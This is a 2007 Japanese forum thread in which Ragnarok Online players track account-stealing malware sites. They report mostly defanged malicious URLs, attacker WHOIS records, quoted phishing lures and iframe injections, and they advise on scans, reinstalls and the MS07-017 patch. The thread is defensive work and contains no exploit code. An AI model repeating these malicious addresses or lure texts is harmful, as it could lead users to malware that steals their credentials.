ttp://www.virustotal.com/vt/en/resultadox?dcf9a612469c584446c9a98289e85569

>>354は数が多かったので、とりあえず2つだけ調べてみた
ttp://www■ro-bot■net/ro-navi/muxiao1■jpg
ttp://www■ro-bot■net/ro-navi/muxiao2■jpg

ttp://www.virustotal.com/vt/en/resultadox?1816663858ec0556ed067d350cd2f4c7
ttp://www.virustotal.com/vt/en/resultadox?8b1403aab6d608c317a5ee41a19fb362

いずれのファイルも同じような結果で、検出率は比較的良好と思われる。

367 名前:(^ー^*)ノ〜さん :07/04/03 11:26 ID:hhkLxrZl0
jpg偽装はあっちでも話題だ、4月1日の記事でリストが纏められている

http://hi■baidu■com/daishuo

上が偽装、下が実行ファイル一覧の形。
結構な数がある、ファイル名から見てアカハックものも散見。
リネージュ資料室記載のものもあるがこれだけあるなら未記載も多いと思う。
tt■exeは間違いなくリネやRO向けアカハックウィルスだろう。

368 名前:(^ー^*)ノ〜さん :07/04/03 11:36 ID:ju8Emfr90
垢ハクとよばれるURLを踏んでしまいました。
どうすればいいでしょうか。
t■p://www■ahatena■com/388465/

369 名前:(^ー^*)ノ〜さん :07/04/03 11:42 ID:hhkLxrZl0
>>368
ただ単に踏んでしまいましたでは答えようがないけれど、簡潔に言うなら。

オンラインスキャンしましょう、詳しくは検索してね。
アンチウィルスソフト買って対策しましょう。
OSの再インストールしましょう。

こんなところ?

370 名前:(^ー^*)ノ〜さん :07/04/03 11:43 ID:cCYjNY7w0
>>368
まずは絶対にROにログインしないこと
アトラクションセンターもダメ

ログインしなければどうということはないので
カスペルスキーオンラインスキャンでチェック
んでOSの再インスコ


もう少し詳しいことを聞きたいならあとはこっちで

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

371 名前:(^ー^*)ノ〜さん :07/04/03 12:44 ID:1uVjtE9C0
光臨の私のblogを歓迎する ホスト:121■0■133■90
http://www■cityhokkai■com■link

訳わからないコメントだったのでソースチェッカー噛ませたら危険サイトだった。
韓国からのアクセスのよう

372 名前:(^ー^*)ノ〜さん :07/04/03 13:09 ID:MAMRpWxY0
http://www5f.biglobe.ne.jp/~serdica/ro/bgm.html

373 名前:(^ー^*)ノ〜さん :07/04/03 13:18 ID:r8T6+LJO0
何がしたいのかわからんが置き換えなしURLとかこのスレでは誰も踏まないぞ?
Roのサウンドが移転どーこーらしいけども

374 名前:(^ー^*)ノ〜さん :07/04/03 13:20 ID:ZoiNZYCo0
BGM変更スレの1にも入ってるサイトだな。

375 名前:(^ー^*)ノ〜さん :07/04/03 13:25 ID:ZoiNZYCo0
良く見たらそのBGM変更スレでテンプレにあるアドレス張ってた。
他にmonazillaスレにも居たがこっちは分からないアドレス。何がしたいのだろう。

376 名前:(^ー^*)ノ〜さん :07/04/03 14:01 ID:3zWFVXio0
AssassinTemplateに頻繁に垢ハックURLが書き込まれています。
新型のURLなら防げないこともあるやもしれませんが、
周知されて1ヶ月も経つようなURLが未だに書き込み可能というのは正直驚きです。

ROサイト管理者連絡会MLの方からアサシンWiki管理人さんへ助言頂けないでしょうか。

377 名前:(^ー^*)ノ〜さん :07/04/03 14:15 ID:pI49ZCik0
● 怪しいアドレス?を踏んだ時用

【  アドレス   】p://www■ahatena■com/388465/
【気付いた日時】 4月3日
【     OS    】WindowsXP Professional
【使用ブラウザ 】 Slepnir
【WindowsUpdateの有無】 一番最後がいつか覚えていない。
【 アンチウイルスソフト 】特に無し
【その他のSecurty対策 】特に無し
【 ウイルススキャン結果】 何もしてません
【スレログやテンプレを読んだか】Yes
【説明】

上記アドレスを某BBSのカキコで踏んだ後。ブラウザの下の枠みたいなところには「ページ表示完了」
と出てたけど、何も表示されていなかったので、そのページを閉じました。そしてその直後に発見!
そのカキコの下のカキコに「このURLは有名な垢ハクだから踏まないように」と記載されていました。

これはやばい!と思い、とりあえずLANケーブルをぬきました。でもそれだと、このにゅ缶で相談できないなぁ
と思って、LANケーブルをさして、さくさくっとカキコして、またLANケーブルを抜きました。
なお、上記出来事は、ばあちゃんの家でのデスクトップPCでの出来事です。
ばあちゃんの家にはもちろんROプレイヤーはいません。そもそもネットつかってるのか、という状況です。
というかPCもほこりかぶりまくりです。

その後自宅に場所移動して、(約2時間後)、自分のPCで、とりあえず、『GungHo-IDパスワード』
『アトラクションIDパスワード』『メールアドレス』を変更しました。あとなんとなくMSNメッセンジャーのパスワードも
変えました。

『キャラパスワード』は今メンテ中なのでしてませんし、なんとなく嫌な予感がしたので、そもそもROにログインしてません。

また、やばい!と思ってから、ばあちゃんちのPCからはガンホアトラクションセンター、ROのログインはしてません。
そのような状況です。とりあえず今からばあちゃんちに戻ってOS最インストールしてきます。

そんな状況です。大丈夫でしょうか。なにか落ち度はありますでしょうか。

378 名前:(^ー^*)ノ〜さん :07/04/03 14:23 ID:+Mq93YIt0
ログインしてないなら大丈夫だし、HDDフォーマットしてOS入れなおすならバッチリ。
あとは何より踏まないようにする事かな。
ばあちゃんちの起動した時に、アップデートやウィルスチェックもしてあげるといいかもね。

379 名前:(^ー^*)ノ〜さん :07/04/03 14:44 ID:PNjQvPp30
>>357,363
まじか。セキュリティパッチ入るまで他所のアドレス踏むのやめとこう。
ani拡張子で蹴ってもリネームするんだろからきついなあ。

380 名前:(^ー^*)ノ〜さん :07/04/03 16:53 ID:6EBf0mBo0
今日管理人さんによって削除されてますが、Eir板にてこんな新スレを作られてました。
対象のURLはまとめサイトにも記載されてますが念のため報告。

メンバー若干名.友好ギルド募集

【ギルド名】love&peace☆
【現M数/平均lv】31名/lv70
【G構想】マッタリでも賑やかなGを
【GVG】非参加
【定例狩り】毎週金曜日22時〜
【IN率】毎日平均10名程で21時〜深夜にかけて上がります
【特徴】マッタリ風味。会話と狩りが盛んです
【溜り場】プロンテラ内
【多い職業】支援職(転生5名、転生前5名>Lv70〜90)

◆GM募集
【募集数】1〜3名
【条件】Lv職業不問ですがIN率は夜中接続以上
【加入後】2週間程は体験メンバーとなり以降正規メンバーへ

◆友好ギルド募集
毎週金曜日一緒に合同狩りしませんか的なコンセプトです
毎週でなくても可。新設G歓迎☆
【条件】溜り場がプロンテラ内かその周辺でGv非参加ギルド
ttp://www■fcty-net■com

381 名前:(^ー^*)ノ〜さん :07/04/03 18:15 ID:o9zBrvWn0
新規のアカハクドメインと思われる物を捕獲。
http://www■aurasoul-visjp■com/bbs/

DomainToolsの解析
http://whois.domaintools.com/aurasoul-visjp.com
によると

Created: 28-mar-2007

Registrant ID ................... hc081827964-cn
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN


いつもの奴でしょう。

382 名前:(^ー^*)ノ〜さん :07/04/03 20:09 ID:MFmYe4WQ0
また嫌な書き込み方が・・・
------------------------------------------
751 :神田川龍伯 :2007/04/03(火) 16:27:51
ご無沙汰しております
なんだか最近ROは不安定なことが続きますが
愛しのムナックを見捨てることはできません!!

と、豪語しながら〜
このたびサイトを移転しましたので
お手数ですが、下記のURLへの
書き換えをお願いいたします。

http://www■blog-livedoor■net/game/

RO関連のページは現在更新しておりませんが
近いうちに復活させる予定ですぅ。
-----------------------------------------
ほんとそろそろ身内にウッカリ踏む人が出てきそうだ。

383 名前:(^ー^*)ノ〜さん :07/04/03 20:48 ID:+Mq93YIt0
セキュリティ弱めの身内にはRO系のスレ、Wiki、BBS、Mixi・ブログのコメントのリンクは一切踏むなと伝えてある。
Wikiは全職チェックしたミラー作ってそっち回覧してもらっている。
そこまでしないといけないような状況になっていて辛い所・・・
ただ、全く関係ないWikiやスレにも張られている事がある事もきっちり伝えておこう。

384 名前:(^ー^*)ノ〜さん :07/04/03 22:13 ID:wc7CDbd90
すげーいいやつだな。
身内とはいえ人のためによくもまぁそこまで・・

385 名前:(^ー^*)ノ〜さん :07/04/03 23:03 ID:tLbnHIbW0
そのミラーURLをうp!
と思ったけどいらん面倒や転送量の問題もありそうだしやめといたほうがいいか

386 名前:(^ー^*)ノ〜さん :07/04/03 23:04 ID:eO9JQUN00
【  アドレス   】http://www■geocities■jp/tadabots/
【気付いた日時】 4月3日
【     OS    】WindowsXP
【使用ブラウザ 】 firefox
【 アンチウイルスソフト 】特に無し
【その他のSecurty対策 】特に無し
【 ウイルススキャン結果】 何もしてません
【スレログやテンプレを読んだか】Yes
【説明】
某所に張られてたんだけど、これはサイトにアクセスした時点でアウト?
サイト内には不正ツール(らしきもの)が多数うpられてるけど、それを落としたらアウト?
どうなの?

因みに俺はアドレスを踏んでしまっただけでツールには触ってません。

387 名前:(^ー^*)ノ〜さん :07/04/03 23:06 ID:IAc8r55v0
ミジンコは帰れ

388 名前:(^ー^*)ノ〜さん :07/04/03 23:21 ID:ZtZani070
>>386
怪しげな所に自ら行く人は、全て自己責任でお願いします。
アングラというのは本来そういう物なのですから。

389 名前:(^ー^*)ノ〜さん :07/04/03 23:26 ID:eO9JQUN00
何か勘違いされてるようですが、俺はbot目当てとかそういう下心があってアクセスした訳ではありません。
(つまりbot関連のスレやサイトからアクセスしたのではないのです)

張られていたのが某GMSでメンバーのホームページだと偽装されてたんです。
よく確かめなかった俺も俺ですが。

390 名前:(^ー^*)ノ〜さん :07/04/03 23:53 ID:o9zBrvWn0
怪しいモノは踏まない触らない。

その辺の事情は置いといて、先ずはこの辺からどうにかしる。
> 【 アンチウイルスソフト 】特に無し
> 【その他のSecurty対策 】特に無し
> 【 ウイルススキャン結果】 何もしてません

> 【スレログやテンプレを読んだか】Yes
読んだんなら大抵の想像はつくと思うんだがな。

391 名前:(^ー^*)ノ〜さん :07/04/03 23:59 ID:rvQCk9SR0
>>386
ここはお前のウィルススキャンの手間を省くためのスレじゃない。

>>390
読むことと理解することは全く別の問題って事だな。

392 名前:(^ー^*)ノ〜さん :07/04/04 00:00 ID:mJpeQRdn0
対策まったくしてない馬鹿が踏もうが関係ないだろう
真面目に相談してるわけじゃないんだしスルーするだ

393 名前:(^ー^*)ノ〜さん :07/04/04 00:07 ID:WwjnKoTc0
まぁ困って質問しに来てるのを無碍にするのもあれだけど
これだけユーザー間で騒がれてることで対策0ってのも問題だよ
自分で「しまった」って思ったのならまずテンプレ読んで理解しておいで
じゃないときついこと言われても言い返せないよ

394 名前:(^ー^*)ノ〜さん :07/04/04 01:42 ID:98JQAP/W0
おまいら。
こういうときはとりあえず脅かしておくもんだぞ。

>>386
対策なしのまま放置している時点でアウトの可能性も高い。
今のままログインしたりすると垢ハックの恐れがある。
ツールに触るかどうかは関係なく、
アドレス踏んだだけで感染するからこれだけ騒がれている。

誰が悪いとか、偽装だからとかは言い訳にならない。困るのはあなた。
リスクを避けたいならOS再インストール頑張れ。

395 名前:(^ー^*)ノ〜さん :07/04/04 01:45 ID:/WugtN0u0
今後も「www■?????■netは垢ハックURLです」という話は続くと思うのだけども、
一元的な解決方法として、テキトーに考えてみた

○認証式の公開HTTP Proxyを立てる。
 ・利用者は配布されたID/Passを使ってHTTP Proxyにアクセス
 ・クライアントIPを、日本のIPに絞る。
 ・中国/韓国へのアクセスを原則禁止にする(一部例外あり)
 ・垢ハックURLが発表されたらブラックリストに追加。

http://www.rbl.jp/index-j.php(RBL.JPプロジェクト RBLでぐぐってもOK)
のようなものかのぅ。
メリット/デメリットとしては

○メリット
 ・ブラックリスト(FQDNとIPアドレス両方)を一元管理できる。
 ・ユーザーがhostsファイルをいじる必要なし。
 ・(管理人の頑張り次第で)他MMOユーザーにも使ってもらえる。

○デメリット
 ・Proxy鯖管理が面倒(管理者が負う責任が大きい)
 ・接続記録がProxy鯖管理人に丸見えだけど、それでいいのかい?
 ・Proxy鯖管理人が悪意もったら逆効果になる。
 ・ID/Passをどうやって管理するんかい?
 ・定期的なブラックリストの更新が面倒

ざっくばらんに考えてみたが・・・・
デメリットでかいね。

まぁ、各個別対応だけでは対処し難い気がするから、
一元的な解決方法もあったら便利だとは思うな。

396 名前:(^ー^*)ノ〜さん :07/04/04 02:59 ID:sWauj3et0
いつも巡回しているサイトに変なのがありました
(現在は怪しい箇所は修正されています)
381と同一URLですが書き込みされた内容を掲載します

-----
現在、aurasoul社のウイルス情報サイトにてラグナロクオンラインを狙った
ウイルスの発生と警告の報告がされています。

ウイルス名 : Trojan.Kakkeys.B(シマンテック社でのウイルス名)
種別 : トロイの木馬

Trojan.Kakkeys.B
発見日 2005年06月30日 (米国時間)
最終更新日 2007年04月03日 (米国時間)

Trojan.Kakkeys.B は、特定の掲示板やWinny ファイル共有ネットワークを介して、
機密情報(ラグナロクオンラインのキャラクター名など)を漏洩しようとする
トロイの木馬型ウィルスです。
ウイルス対策ソフトをご使用されている方は、パターンファイルの更新を行った後、
必ずご自身が利用しているパソコンのウイルスチェックを行っていただけますよう
お願いいたします。

なお、このウイルスに関する対策法などの詳しい情報は、下記aurasoul社のサイトなど
お客様がご利用されているウイルスソフトベンダー様のサイトにて
ご確認をお願いいたします。
http://www■aurasoul-visjp■com/bbs/

ラグナロクオンライン運営チーム
-----
aurasoul-visjp■comをソースチェッカーオンラインで調べると
IP:222.77.185.88(Chinanet Fujian Province Network)/China

397 名前:(^ー^*)ノ〜さん :07/04/04 03:37 ID:gM97i8760
もうなんか…だめぽ。気をつけてるけどいつ引っかかってもおかしくないと思ってる俺が警告age

398 名前:(^ー^*)ノ〜さん :07/04/04 04:05 ID:hs+9FggC0
>>396
うわ、ここまで巧妙になりましたか
ここまで来ると危険ドメインを知っている人じゃないとほんとに踏んでしまいそう
かなりやばい状況

「ラグナロクオンライン運営チーム」の名前を使っていることで癌に動いて
もらえないのだろうか・・・期待できないけど・・・

>>367のリストからリネージュ資料室さんにも大量の危険サイト・危険ドメインが
追加されていますね。リネージュ資料室の管理にさんもここ見てるのかな

399 名前:(^ー^*)ノ〜さん :07/04/04 04:34 ID:rzRo7x2X0
.ani関連、クリティカルなのでこちらにも掲載。
KB925902
http://support.microsoft.com/kb/925902
MS07-017
http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx
Windows Updateサイト(or WSUS)から速やかにアップデートする事を推奨。

400 名前:(^ー^*)ノ〜さん :07/04/04 04:52 ID:pUOIGVnk0
日本語も来てた。
http://www.microsoft.com/japan/technet/security/bulletin/ms07-017.mspx
2000・XP・2003・Vista

401 名前:(^ー^*)ノ〜さん :07/04/04 07:53 ID:upFlsL4c0
検体を収集して送る人向けの情報。
ani(あるいは偽装のjpg、gif、etc.)はエディタ
(バイナリエディタ推奨、無ければメモ帳でも可)で開くと
ファイルの末尾にexeのURIが書いてあります。
ちなみにaniはぶっちゃけ複数のicoをRIFFで固めたものなので先頭はRIFF。

402 名前:(^ー^*)ノ〜さん :07/04/04 08:15 ID:X9Ip1c8a0
>>398
名前を騙るのなんてウイルス拡散の常套手段だぞ

垢ハックじゃないけど、MSとかウイルス対策ベンダーを騙る手口は過去に何度もあったし

403 名前:(^ー^*)ノ〜さん :07/04/04 09:07 ID:Qc4cwfsl0
396のドメイン名はどうも掲示板のパクリらしい
またしてもなんちゃって掲示板のようだね。

元(メビウスリング掲示板)
http://aurasoul■vis■ne■jp/

連中の罠ドメインは"*jp.com"が多いな。
掲示板持ちで関連の禁止語句書ききれなくなったらこれで纏めてもいいかと思う。
知人友人がそうしたドメインをとっていなければだけどね。

404 名前:(^ー^*)ノ〜さん :07/04/04 10:24 ID:GTCmkqeu0
>>396 の本文だけ借りてヘルプデスクにこういうのもあるんだから公式サイトに注意喚起しろって投稿しといた。
まじでなんとかしてほしい。

405 名前:(^ー^*)ノ〜さん :07/04/04 10:40 ID:/1eOCxE50
mixi日記のコメントですけど、うちにも貼られてました。
コメント内容はまったく脈絡のないホラーうんぬんだったので
踏んだ人はいないと思われます。
一応貼ったユーザーはmixi側に通報しておきました。

http://urpoka■blog75■fc2■com/

406 名前:(^ー^*)ノ〜さん :07/04/04 11:00 ID:Qc4cwfsl0
>>405
またFC2か、ダメだな。
ラブ台湾(lovetw)がソース末尾に書き込まれてる。

ブログ内容は空っぽだった。
罠誘導専用ブログ確定。

407 名前:(^ー^*)ノ〜さん :07/04/04 11:24 ID:iZVr54Gq0
http://nikang■blog79■fc2■com/

不自然なコメだったので消したが
ソースチェッカーにかけたら黒。

中身はOdinの人のBlogのコピー

408 名前:(^ー^*)ノ〜さん :07/04/04 13:04 ID:5JR1KGpH0
ヤフーでOWNて検索して
http://www■own■jp
のアドレスをクリックしたら画面真っ白なページが表示されました。
これって垢ハックアドレスでしょうか・・?

409 名前:(^ー^*)ノ〜さん :07/04/04 13:19 ID:otzENJpZ0
>>408
OWN RAGNAROKは2月に閉鎖しました。
現在は別ページにクエストまとめ+閉鎖の際の告知だけ残っています。
ttp://www8.plala.or.jp/ragnarok/

で、そのページは真っ白なだけで無害です。

410 名前:(^ー^*)ノ〜さん :07/04/04 13:21 ID:WvchBpn70
そこは唯のブランクページ。

一応言っておくとOWNは現在閉鎖して存在していない。

アドレスはミラーと併せて2つあったが、閉鎖前にそっちのアドレスは使われなくなった。
そしてその後閉鎖した。
垢ハクが激しい時期に閉鎖したため、後にOWNのドメインを中華その他に悪用されたら困ると
いう意見が多く出た。
そのためドメインはOWNの管理人が暫くは保持してくれる事になって、現在に至る。

411 名前:408 :07/04/04 13:24 ID:5JR1KGpH0
閉鎖されてたのですか。知らなかった・・・
今垢ハックはやってるので警戒しすぎてしまいました。

ご親切にありがとうございます

412 名前:(^ー^*)ノ〜さん :07/04/04 14:04 ID:d17V6AEn0
あれだ危険ドメインを晒すサイトとかってないかね?

413 名前:(^ー^*)ノ〜さん :07/04/04 14:21 ID:upFlsL4c0
テンプレ読めばいいと思うよ。

414 名前:(^ー^*)ノ〜さん :07/04/04 15:36 ID:d17V6AEn0
そんなテンプレあるんだ・・・

415 名前:(^ー^*)ノ〜さん :07/04/04 15:39 ID:TjO67E570
>>414
おまいさんの目はフシアナか

416 名前:(^ー^*)ノ〜さん :07/04/04 15:41 ID:ZpffGppv0
>>414
要は>>1-2を読めってこと

417 名前:(^ー^*)ノ〜さん :07/04/04 15:49 ID:WvchBpn70
意図がよく判らん。
危険ドメインの一覧を見たいのか、危険ドメインを見つけたから晒したいのか。

前者なら>1-2、後者ならこのスレかセキュスレ。

418 名前:(^ー^*)ノ〜さん :07/04/04 18:08 ID:PG1rT9AH0
弓手スレより転載

855 :弓手Wikiかんり ◆Ymlphaz5wQ :07/04/04 13:56 ID:cAVvM/z/0
アカウントハッキング(アカハック)について

一向に止む気配のないアカハックですが、弓手Wikiへも
アカハックURLの書き込みが毎日数回程度来ております。

spamフィルタにより今のところblockできているので、
閲覧者の目に触れることはありませんが、敵は次々と
新しいドメインを取得していますし、サーバのクラッ
キングにより旅行会社のWebサイト上に置かれた事例も
あります。
最近では blog???.fc2.comなど本物のblogサイト上に
他所のblogからの画像、文章のコピペで偽blogを作成し
アカハックURLを読み込ませるものすら存在します。

管理者連絡会を設立して管理者間で情報交換するなど、
できるかぎりの対策をしていますが、閲覧者側の環境に
脆弱性があるままでは何をしても決定打にはなりえません。

** 最低でも WindowsUpdateをしてください **
特に本日(4/4)配布のものは、最近発見され、すでに
アカハックURLで利用されている 非常に危険度が高い
脆弱性に対応した更新を含んでいます。

** アンチウィルスソフトを入れパターンを更新してください **
ただし格安ものはアカハック系に弱いことが多いです。

419 名前:(^ー^*)ノ〜さん :07/04/05 11:51 ID:3FNjrU+X0
>>338
NOD32で検出できなかったので報告した結果。
−−−−−
ご提供していただいた検体(添付ファイル)について、
開発元であるESETから「ファイルは問題ない」との回答を
得ました。

しかしながら、下記サイト
> http://www■kotonohax■com/blog/xzz■exe
に現在置かれているファイルについては
「Win32/PSW.Maranの亜種」として検出することを確認致
しました。

現在は報告時にあったファイルとは別のものが保存され
ているようです。
−−−−−
確かに、報告時の検体は「現時点でも」検知しません。挙動確認の結果問題無かったということは、
その時点では、未完成品を置いてたのかも。
但し、現時点で置いてある同名のファイルは検知されます。(動作するものが置いてあるということ)

同じアドレスで過去に検知しても、差し替えられる可能性がありますね。
やっぱり、こまめに、パターン更新して、報告して、対応してもらうしかないようです。

420 名前:(^ー^*)ノ〜さん :07/04/05 16:10 ID:KjeQF3U80
↓↓↓本日RMCに書き込まれてたもの↓↓↓

New ひっとん さん 2007/04/05 (木) 14:56 UID:[ 41273@FU0/yO6N ] [ メール ]

神器材料買取してます、何かあればお声をおかけください。
白ポ?青ポ?白スリム?塩酸?火炎瓶は販売の他、材料との交換も行ってます。
販売価格及び交換比率は各自お問い合わせください。
その他応相談 ※身内特典あり(詳しくは本人まで)
http://csfir■blog87■fc2■com/
RO歴史の上で最も変態の装備.
 意外にも1つの国民中学校に出て手を生みます!!
 詳しい情況−−
http://bqdr■blog98■fc2■com

↑↑↑本日RMCに書き込まれてたもの↑↑↑

上のは>>341に出てるけど、下のは初めてかな。
IFRAMEで http://www■lovetw■webnow■biz/2jp が仕込まれてます。

ブログの内容だけど、他のブログからテキストや画像を集めてきて、適当に貼り付けただけの模様。
これからも数日に1回のペースでFC2に罠ブログ作り続けるつもりなのかなあ。

421 名前:(^ー^*)ノ〜さん :07/04/05 20:24 ID:Gd9V6NmE0
最近よく垢ハックアドレスが仕掛けられている職Wikiは3つ。
AssassinTemplate、騎士スレテンプレ、ソウルリンカーwiki
spam.ini.phpを導入して対策を取って欲しいところですが・・・

422 名前:(^ー^*)ノ〜さん :07/04/05 20:55 ID:FgdXryfV0
【      気付いた日時          】 4/5
【不審なアドレスのクリックの有無 】 不明
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 WinXP SP2
【使用ブラウザ 】IE6 Sleipnir
【WindowsUpdateの有無】 4/4
【 アンチウイルスソフト 】 カスペルスキーインターネットセキュリティ5.0
【その他のSecurty対策 】 ルータ経由
【 ウイルススキャン結果】 最新状態に更新したカスペルスキーで完全スキャンしても何も出ず。
【スレログやテンプレを読んだか】 No
【説明】
それまで使っていたウィルスバスターからカスペルスキーオンラインへ昨日変えたのですが
カスペルスキーに変えてROを起動して遊んでいる途中or起動時にウィルスと検知します。
ログはこんな感じでした。
検知しました: リスクウェア Private data and passwords access プロセスを実行します。: C:\Documents and Settings\○○○○\Local Settings\Temp\RFS884C.tmp\rfwipeout.exe
検知しました: リスクウェア Hidden object プロセスを実行します。: D:\Ragexe.exe

と、ここまで書いて思ったのですが、ロボフォームがROのパス入力に反応してるだけで無害なのかな?
検知した二つの物は信頼ゾーンへ入れてもいいのだろうか。。。

423 名前:(^ー^*)ノ〜さん :07/04/05 21:07 ID:p9ZWB8iq0
間違って >>294 を開いてしまいました。

ウイルスソフト SOURCENEXTstyleでウイルスチャックをして見つからず。
カスペルキーでチャックをしたけど見つからなかったけど大丈夫なのですか?

424 名前:(^ー^*)ノ〜さん :07/04/05 21:14 ID:hiZIaLh30
リネージュ資料室によると毎度おなじみ福建人により以下ドメインが登録された模様。
また”*jp.com”ドメインと登録郵便番号が四川省成都で住所が福建省竜岩。

www■ywdgigkb-jp■com

Domain Name ..................... ywdgigkb-jp■com

Registrant Name ................. zhiqiqnag lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian
Registrant City ................. longyan
Registrant Province/State ....... fujian longyan
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

425 名前:(^ー^*)ノ〜さん :07/04/05 21:16 ID:kB6EiKu60
>>423
安心したいならOS再インストしてら

426 名前:(^ー^*)ノ〜さん :07/04/05 22:23 ID:eurhkPgE0
>>423
■で置換してあるのに開くって、
先頭のwwwまでを開いた、とかいわないよね?

それなら害はないので、そのチャックで十分かもしれん。

427 名前:(^ー^*)ノ〜さん :07/04/06 00:18 ID:BdPTKrVt0
別件で同じURLを開いたとか

428 名前: ◆sp4Sh9QXGI :07/04/06 11:39 ID:ycjHgPnv0
中の人です。
今日の更新:
 ・ywdgigkb-jp■comを追加しました。
 ・危険URLの貼り付けを行うIPに
  219.128.0.0/12
  を追加しました。

429 名前:(^ー^*)ノ〜さん :07/04/06 12:35 ID:PICwuj3G0
こんなドメインを発見、登録情報から毎度おなじみ福建人のものと断定。

www■gamesroro■com

Domain Name ..................... gamesroro■com

Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

430 名前:(^ー^*)ノ〜さん :07/04/06 13:19 ID:w7CluOoW0
変な韓国IPがネット接続を妨害してきて困る。

431 名前:(^ー^*)ノ〜さん :07/04/06 14:38 ID:wB4WTNiB0
    /    ||    :ヽ
   ┌|(⌒ヽ :|| ..:⌒: |┐   / ̄ ̄ ̄ ̄ ̄ ̄ ̄
   |::|::ヽ.__:):||(___ノ ::|::|  │
    |:|: ..   :||    .. |:|  │
    :|: ..   ||    ..|| <   ジュワ!
     :\ [_ ̄] /::|   │
::     |\|_|_|_|_/:::|    \________
   __| |   / / :|___

432 名前:(^ー^*)ノ〜さん :07/04/06 16:30 ID:u97Dhrq60
かなり時間たつけど >423 の者です。
4/5日にブログに書かれており、そのとき、気をつけていなく、開いてしまった。
@から気づき急いでここを見て、PCのウイルスソウトとカスペルスキーを使って検知したところ
何も検知できなかったわけです。説明不足でごめんなさいorz
開いた先だけど、ブロックしてあったのか、エラーが出て表示されました。

433 名前:(^ー^*)ノ〜さん :07/04/06 17:26 ID:zxRsMLJ60
>>432
テンプレ>>4を使って報告してください。
テンプレには報告すべき重要な項目が含まれているのです。
それを無視して報告しても、アドバイスなどできるはずもありません。

434 名前:(^ー^*)ノ〜さん :07/04/06 17:42 ID:6t4ZI22O0
遂に登場というか垢ハックアドレスコンボが降臨

RMCの雑談掲示板に以下の投稿を発見
-----
↑ No.234047 [ 引用付き返信 ] [ 返信 ] [ 終了 ] [ 仮削除 ] [ 完全削除 ] [ 管理 ]
雑談 - ソウルリンカー情報交換スレ
New 桜樹 さん 2007/04/06 (金) 17:25 UID:[ 41285@EVY8lPjX ]


ソウルリンカー、およびリンカー志望テコンキッドの情報交換を目的としたスレッドです。
積極的な情報収集、意見交換で盛り上げて行きましょう。

■お約束
sage進行です。メール欄にsageと入力(半角小文字)

※質問相談をする前にテンプレwiki、現行スレを検索してみましょう
※狩場報告、質問相談は情報公開用テンプレを参考に他者が参照しやすいように
※愚痴煽り叩きの類はカアヒとカウプを駆使して華麗にスルー。エスクしないように

■前スレッド
ソウルリンカー情報交換スレ LINK-10
http://www■game-mmobbs■com/bbs/

■ソウルリンカーwiki
http://www■wikiwiKi-game■com/8651262/

■関連サイト
【ステアップ板】 http://nike-net■com/linker_wiki/gms/list.php
【リンカー計算機】 http://www■ragnarok-sara■com/bbs/
【エスマ確殺計算機】http://www■slower-qth■com/8651262/
【ROratorio(RO計算機)】 http://roratorio■2-d■jp/ro/
【わむてるらぶ(スキルシミュレータ)】 http://www■aurasoul-visjp■com/bbs/
-----

435 名前:(^ー^*)ノ〜さん :07/04/06 17:59 ID:XmHkJ1Mz0
ほんと色々やってくれるなー

436 名前:(^ー^*)ノ〜さん :07/04/06 18:01 ID:XDRcw2wa0
■Kasperskyのセキュリティ製品に脆弱性、最新版にアップデートを
http://internet.watch.impress.co.jp/cda/news/2007/04/06/15340.html

         ナ ゝ   ナ ゝ /    十_"    ー;=‐         |! |!
          cト    cト /^、_ノ  | 、.__ つ  (.__    ̄ ̄ ̄ ̄   ・ ・

     , '´ ̄ ̄` ー-、             -‐ '´ ̄ ̄`ヽ、
   /   〃" `ヽ、 \          / /" `ヽ ヽ  \      -‐ '´ ̄ ̄`ヽ、
  / /  ハ/   u \ハヘ         //, '/ u    ヽハ  、 ヽ / /" `ヽ ヽ  \
  |i │ l |リ\    /}_}ハ.       〃 {_{\    /リ| l │ i| //, '/   u ヽハ  、 ヽ
  |i | 从 ● u   ●l小N      レ!小l●    ● 从 |、i|〃 {_{\ u   /リ| l │ i|
  |i (| ⊂⊃ 、_,、_, ⊂li|ノ         ヽ|l⊃ 、_,、_, ⊂⊃ |ノ | レ!小l●    ● 从 |、i|
  | i⌒ヽ j  (_.ノ   ノi|__/⌒) /⌒ヽ__|ヘ u  ゝ._)   j /⌒i ! ヽ|l⊃ 、_,、_, ⊂⊃ |ノ│
  | ヽ  ヽx>、 __, イl |::::ヽ/. \ /:::::| l>,、 __, イァ/ ./⌒ヽ__|ヘ   ゝ._)   j /⌒i !
  | ∧__,ヘ}::ヘ三|:::::/l| |',:::::ハ   ./:::::/| | ヾ:::|三/::{ヘ、_..\ /:::::| l>,、 __, イァ/  /│
  | ヾ_:::ッリ :::∨:/ | | >'''´    .`ヽ< | |  ヾ∨:::/ヾ:::彡' /:::::/| | ヾ:::|三/::{ヘ、__∧ |

437 名前:(^ー^*)ノ〜さん :07/04/06 18:26 ID:Eil8bnAK0
>>434
どうすんだこんなの・・・

438 名前:(^ー^*)ノ〜さん :07/04/06 18:30 ID:JWp0piYH0
文章の内容は理解せず、URLの載った文章を再利用しているだけ
ってこと。

439 名前:(^ー^*)ノ〜さん :07/04/06 20:01 ID:gejv3Ux50
絵のサイト(一部ROの絵を含む)を運営してる者なんですが、
最近垢ハックウイルスのアドレスが貼られていたので注意ということで。
http://www■linkcetou■com/

まさか絵のサイトにまでやってくるとは思いもよらなかったよ…('A`)

440 名前:(^ー^*)ノ〜さん :07/04/06 20:21 ID:KutWs7G50
この問題マジでどうにかしないとRO終わるぞ

441 名前:(^ー^*)ノ〜さん :07/04/06 21:03 ID:Fuw6iAvf0
ROに限ったことじゃない
ネットゲーム全部が終わる

442 名前:(^ー^*)ノ〜さん :07/04/06 21:04 ID:bHc8OvZf0
>>434
すげぇ…。
